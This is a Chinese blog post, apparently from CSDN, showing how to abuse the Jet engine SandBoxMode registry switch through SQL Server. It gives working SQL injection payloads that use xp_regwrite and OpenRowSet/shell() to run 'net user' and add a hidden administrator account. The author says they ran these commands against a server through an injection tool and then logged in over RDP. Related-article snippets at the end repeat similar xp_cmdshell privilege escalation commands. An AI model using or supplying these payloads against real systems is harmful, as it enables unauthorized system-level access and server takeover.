[sql server][access]沙盒漏洞

最新推荐文章于 2023-02-03 11:35:19 发布
最新推荐文章于 2023-02-03 11:35:19 发布
阅读量2.6k 收藏 3
点赞数
文章标签: access sql server shell vba 数据库 数据库相关


首先我在<Jet引擎可以调用VBA的shell()函数>(http://www.520hack.com)这份资料知道在accessl里可以直接进行sql查询,具体的在Access中测试.测试的SQL语句如下:

Select shell('c:/windows/system32/cmd.exe /c net user ray 123 /ad');

查看计算机管理的本地用户,马上发现多出一个ray用户,说明语句成功执行了.接下来写一个VBS脚本任意连接一个mdb来测试这个SQL语句

Set Conn=Createobject("Adodb.Connection")

Conn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=test.mdb"

Set Rs=Conn.execute("Select Shell(""cmd.exe /c net user ray 123 /ad"")")
Msgbox Rs(0)

运行后会出现"表达式中的'Shell'函数未定义"的错误,<Jet引擎可以调用VBA的shell()函数>提到WINDOWS在Jet 引擎中设置了一个名为SandBoxMode的开关,它的注册表位置在HKEY_LOCAL_MACHINE/SoftWare/Microsoft/ Jet/4.0/Engine/SandBoxMode里,0为在任何所有者中中都禁止起用安全设置,1为仅在允许的范围之内,2则是必须是Access 的模式下,3则是完全开启安全设置.默认情况下为2,只能在Access的模式下调用VBA的shell()函数,我们尝试将此注册表值改为0,结果成功的运行了VBS利用Jet引擎可以调用VBA的shell()函数执行了系统命令.


通常一台MSSQL服务器同时支持Access数据库,所以只要有一个sa或者dbowner的连接,就满足了修改注册表的条件,因为MSSQL有一个名为xp_regwrite的扩展,它的作用是修改注册表的值.语法如下


exec maseter.dbo.xp_regwrite Root_Key,SubKey,Value_Type,Value


如果存在一个sa或者dbowner的连接的SQL注入点,就可以构造出如下注入语句

InjectionURL;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare/Microsoft/Jet/4.0/Engine','SandBoxMode','REG_DWORD','0'--

那我们将SandBoxMode开关的注册表值修改为0就成功了.接着连接到一个Access数据库中,就可以执行系统命令,当然执行系统命令我们只需要一个Access数据库相关Select的注入点或者直接用ASP文件Select调用这个VBA的shell()函数,但是实际上MSSQL有一个的OpenRowSet函数,它的作用是打开一个特殊的数据库或者连接到另一个数据库之中.当我们有一个SA权限连接的时候,就可以做到打开Jet引擎连接到一个Access数据库,同时我们搜索系统文件会发现windows系统目录下本身就存在两个Access数据库,位置在%windir%/ system32/ias/ias.mdb或者%windir%/system32/ias/dnary.mdb,这样一来我们又可以利用 OpenRowSet函数构造出如下注入语句:

InjectionURL';Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:/winnt/system32/ias/ias.mdb','select shell("net user ray 123 /ad")');--


如果你觉得不大好懂的话,我可以给你做一个简化的理解:

1,Access可以调用VBS的函数,以System权限执行任意命令

2,Access执行这个命令是有条件的,需要一个开关被打开

3,这个开关在注册表里

4,SA是有权限写注册表的

5,用SA写注册表的权限打开那个开关

6,调用Access里的执行命令方法,以system权限执行任意命令

所以,今天我使用HDSI的执行SQL命令,执行了以下命令:

EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',0

Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:/windows/system32/ias/ias.mdb','select shell("net user zyqq 123 /add")');

Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:/windows/system32/ias/ias.mdb','select shell("net localgroup administrators zyqq /add")');

最后,用这个新加上的用户,成功登陆3389

永生天地
关注
1433之黑吃黑杀手锏——沙盒模式
03-07
1433之黑吃黑杀手锏沙盒模式
SQL Server沙盒提权
qq_43665434的博客
05-24 1126
SQL Server沙盒提权 实验环境:windowsXP + SQL Server2005 exec sp_configure 'show advanced options',1;reconfigure; exec sp_configure 'Ad Hoc Distributed Queries',1;reconfigure; --关闭沙盒模式,如果一次执行全部代码有问题,先执行上面两句代码。 exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTW
CVE-2022-0543 Redis沙盒逃逸漏洞
weixin_45715461的博客
07-01 3574
CVE-2022-0543 Redis沙盒逃逸漏洞
Redis沙盒逃逸漏洞(CVE-2022-0543)复现以及流量特征分析
xhscxj的博客
02-03 1935
Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。Redis 存在代码注入漏洞,攻击者可利用该漏洞远程执行代码。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。
【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-10
youngerll的博客
01-03 2165
【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-10
沙盒软件Sandboxie
05-17
沙盒软件Sandboxie是一种强大的安全工具,它允许用户在隔离的环境中运行应用程序,从而保护主系统不受潜在有害程序的影响。这种技术的核心理念是“在沙盒中玩”,即所有在沙盒内的操作都不会对真实系统产生永久性...
Win10如何开启沙盒软件
最新发布
05-28
Win10如何开启沙盒软件
2016年iOS公开可利用漏洞总结
01-04
iOS的安全性远比大家的想象中脆弱,除了没有公开的漏洞以外,还有很多已经公开并且可被利用的漏洞,本报告总结了2016年比较严重的iOS漏洞(可用于远程代码执行或越狱),希望能够对大家移动安全方面的工作和研究带来...
iOS 沙盒图片保存读取实例
08-28
在iOS应用开发中,每个应用程序都有自己的专属存储空间,称为“沙盒”(Sandbox)。沙盒机制是苹果为了保护用户数据安全和隐私而设计的一种机制,它限制了应用程序只能访问自己沙盒内的文件,不能随意访问其他应用的...
SQL-for-data-science-Coursera-answers:此处提供了名为 SQL for Data-Science 的 Coursera 作业的所有答案
08-04
SQL-for-data-science-Coursera-answers 此处提供了名为 SQL for Data-Science 的 Coursera 作业的所有答案。 访问链接以获取并兼容简单的视图和集成。
SQL Server 数据库提权的几种方法——提权教程
热门推荐
W小哥
01-20 1万+
一、简介 在利用系统溢出漏洞没有效果的情况下,可以采用数据库进行提权。 数据库提权的前提条件: 1、服务器开启数据库服务 2、获取到最高权限用户密码 (除Access数据库外,其他数据库基本都存在数据库提权的可能) 二、使用xp_cmdshell进行提权 xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重新开启它。 启用: EXEC sp_configure ‘show advanced opti
Access 中查找并删除重复记录
u012464951的专栏
11-05 1万+
如果您的 Access 数据库包含从多个源导入的数据,或者您继承了已经使用多年而且没有得到正确设置的数据库,那么该数据库中可能包含需要清除的重复记录。 要确定 Access 表中是否存在重复记录,可以使用 Access 中的“查找重复项查询向导”;如果您的表包含的重复记录不多,并且您需要先查看记录再决定删除哪些记录,“查找重复项查询向导”可以帮助您清除重复记录。但是,您也可以自动删除重复记录
【安全牛学习笔记】MSsql2005(Sa)权限执行命令总结
edu_aqniu的博客
10-31 716
​一.xp_cmdshell EXEC master..xp_cmdshell 'ipconfig' 开启xp_cmdshell: -- To allow advanced options to be changed. EXEC sp_configure 'show advanced options', 1 GO -- To update the current
android沙箱逃逸漏洞,【技术分享】沙盒逃逸技术详解(一)
weixin_40004051的博客
06-01 855
预估稿费:170RMB投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿写在前面的话在过去的十多年里,针对恶意软件沙盒逃逸技术的分析已经成为了对抗高级持续性威胁的银弹,虽然这种技术变得越来越热门,但是恶意软件的开发者们似乎也找到了一种基于静态分析的方法(例如加密、混淆处理和反逆向保护等技术)来躲避传统反病毒安全工具的检测。因此,针对恶意软件沙盒逃逸技术的分析与研究已经成为了我们抵...
Lisk沙箱漏洞分析及解决方案
ASCH
11-29 453
lisk目前的沙箱机制不足以限制侧链代码的权限,其次,是关于侧链开发者的,lisk的侧链代码是运行在一个拥有全部能力的javascript环境,这里面有些可以导致不确定因素的函数.
漏洞学习——沙盒跳出】————1、九星时代触摸屏报刊阅读系统沙箱通用绕过
Fly_鹏程万里
02-27 639
漏洞详情 法1-点击终端上的期刊阅读,翻看一本杂志几面后,提示购买,直接点击进入,弹出ie窗口而不是内置界面,然后通过ie对系统文件夹“浏览”,调出各种程序 法2-系统电源开关位于机箱背面右下角,直接重启,靠快速操作调出各种程序,已测试可行 注:本系统每隔1min将会刷新一次,将报刊系统全屏化,但是只要你手快点出任务管理器结束所有有关ninestar的读报系统进程,也就是有关dubao ...
SQL Server提权总结与记录-xp_cmdshell/sp_oacreate/sandbox提权
baynk的博客
05-17 6089
0x00 Sql server提权基础 Sql server也称Mssql Server,是微软家的数据库,但是要注意,sql server同样也能在linux中安装使用,本文主要记录sql server的提权方式。 sql server提权主要依赖于sql server自带的存储过程。 存储过程是一个可编程的函数,它在数据库中创建并保存,是存储在服务器中的一组预编译过的T-SQL语句。数据库中的存储过程可以看做是对编程中面向对象方法的模拟。它允许控制数据的访问方式(可以将存储过程理解为函数调用的过程),使
1433终极入侵之沙盒模式
收集盒 Book box
05-08 813
<br />1433好扫,但是难入侵啊! <br /><br />不是127错误,就是命令被禁用。 不是缺少哪个DLL文件,就是126错误。<br /><br />哈,甚至连映像劫持、asshell、jobshell、seshell全部都使用不了,甚至SQL语句读写注册表都不行,该如何办?<br /><br />或许你忽略了一招你们忘记了沙盒模式的威力。其实很多人也知道沙盒模式,但是没有深究。所以忽视了它。<br /><br />下面我介绍它:<br /><br />select * from openro
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值